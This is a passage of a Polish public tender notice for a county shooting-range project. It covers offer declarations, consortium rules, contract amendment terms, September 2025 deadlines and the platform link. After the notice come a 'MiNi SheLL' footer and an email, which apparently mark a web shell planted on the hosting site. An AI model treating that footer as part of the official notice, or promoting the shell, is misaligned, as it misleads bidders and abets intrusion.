oferty np. nr KRS, nr NIP, Nr REGON lub inny numer dokumentu, wskazanie wydającego urzędu lub organu, lub określony adres internetowy.<br/>3)	Oświadczenie, o którym mowa w art. 125 ust. 1 o niepodleganiu wykluczeniu, aktualne na dzień składania ofert - załącznik nr 2 do SWZ.<br/>Oświadczenie składa się, pod rygorem nieważności, w formie elektronicznej (w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. Oświadczenie, o którym mowa składa odpowiednio;<br/>•	wykonawca,<br/>•	każdy ze wspólników konsorcjum Wykonawców (w przypadku składania oferty wspólnej), oraz każdy ze wspólników spółki cywilnej,<br/>4)	Pełnomocnictwo – jeżeli dotyczy, <br/>Upoważnienie osób podpisujących ofertę musi bezpośrednio wynikać z dokumentów dołączonych do oferty. Oznacza to, że jeżeli upoważnienie takie nie wynika wprost z dokumentu stwierdzającego, że osoba działająca w imieniu wykonawcy jest umocowana do jego reprezentowana, to do oferty należy dołączyć stosowne pełnomocnictwo. <br/>W przypadku składania oferty wspólnej przez kilku przedsiębiorców (tzw. konsorcjum) wspólnicy muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy. Do oferty należy dołączyć stosowne pełnomocnictwo.<br/><br/>Zamawiający wskazuje, iż badanie braku podstaw wykluczenia będzie odbywało się jedynie w oparciu o treść oświadczenia, o którym mowa w art. 125 ust. 1 Pzp - załącznik nr 2 do SWZ.<br/>Zamawiający nie będzie żądał podmiotowych środków dowodowych na potwierdzenie braku podstawa wykluczenia. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> INFORMACJA DLA WYKONAWCÓW WSPÓLNE UBIEGAJĄCYCH SIĘ O UDZIELENIE ZAMÓWIENIA (konsorcja/spółki cywilne);<br/>1)	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego.<br/>2)	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia zobowiązani są złożyć wraz z ofertą stosowne pełnomocnictwo.<br/>3)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp o niepodleganiu wykluczeniu składa każdy z wykonawców. <br/>4)	Jeżeli oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, zostanie wybrana, zamawiający będzie żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Strony przewidują możliwość dokonywania zmian Umowy na warunkach określonych w art. 455 ust 1 pkt 2-4 i ust. 2<br/>Ustawy Pzp.<br/>2. Poza sytuacjami określonymi w ust. 1, zmiany Umowy będą mogły nastąpić w następujących<br/>sytuacjach:<br/>1) w zakresie sposobu wykonania przedmiotu umowy w szczególności, gdy zmiana sposobu realizacji wynika ze zmian w<br/>obowiązujących przepisach prawa bądź wytycznych mających wpływ na wykonanie zamówienia,<br/>2) w zakresie zmian doprecyzowujących treść umowy, jeżeli potrzeba ich wprowadzenia wynika z rozbieżności lub<br/>niejasności w umowie, których nie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i<br/>doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów,<br/>3) zaistnienia, po zawarciu Umowy, przypadku siły wyższej, przez którą, na potrzeby niniejszego warunku rozumieć należy<br/>zdarzenie zewnętrzne wobec łączącej Strony więzi prawnej:<br/>a) charakterze niezależnym od Stron,<br/>b) którego Strony nie mogły przewidzieć przed zawarciem Umowy,<br/>c) którego nie można uniknąć ani któremu Strony nie mogły zapobiec przy zachowaniu należytej staranności,<br/>Za siłę wyższą, warunkująca zmianę Umowy uważać się będzie w szczególności: epidemię, powódź, pożar i inne klęski<br/>żywiołowe, zamieszki, strajki, ataki terrorystyczne, działania wojenne, nagłe załamania warunków atmosferycznych, nagłe<br/>przerwy w dostawie energii elektrycznej, promieniowanie lub skażenia, które uniemożliwiają wykonanie umowy na<br/>warunkach w niej określonych.<br/>4) nastąpiła zmiana przepisów prawa istotnych dla realizacji przedmiotu umowy;<br/>5) zaistnienia omyłki pisarskiej lub rachunkowej<br/>6) zmiany danych Wykonawcy bez zmiany samego Wykonawcy (np. zmiana siedziby, adresu, nazwy), <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-09-04 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Platformy Przetargowej pod adresem : https://powiatprzeworsk.logintrade.net/zapytania_email,207459,00123021d5a76b9694416b5e304e22b3.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-09-04 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-10-03</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamówienie dotyczy zadania dofinasowanego w ramach konkursu ofert prowadzonego przez Ministra Obrony Narodowej<br/>pn.: „Strzelnica w powiecie 2025” nr 4/2025/CWCR.<br/>Z postępowania wyklucza się wykonawców, w stosunku do których zachodzi którakolwiek okoliczności wskazanych w art. 7<br/>ust. 1 ustawy z dnia 13 kwietnia 2022r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na<br/>Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2022r. poz.835). Zamawiający dokona weryfikacji<br/>podstaw wykluczenia, w zakresie art. 7 ust.1 ustawy sankcyjnej na podstawie oświadczeń własnych Wykonawcy.<br/>Wykonawca, którego oferta zostanie uznana za najkorzystniejszą, będzie zobowiązany przed podpisaniem umowy do:<br/>1) przedstawienia pełnomocnictwa, jeżeli umowę podpisuje pełnomocnik,<br/>2) przedłożenia kopii umowy regulującą współpracę wykonawców wspólnie ubiegających się o udzielenie zamówienia, jeżeli<br/>oferta tych wykonawców zostanie wybrana,<br/>3) przedłożenia kopii dokumentów potwierdzających posiadanie uprawnień przez osobę wskazaną w Wykazie Osób,<br/>4) wyceniony przedmiar robót, sporządzony zgodnie ze złożoną ofertą (wartością).

Creat By MiNi SheLL
Email: jattceo@gmail.com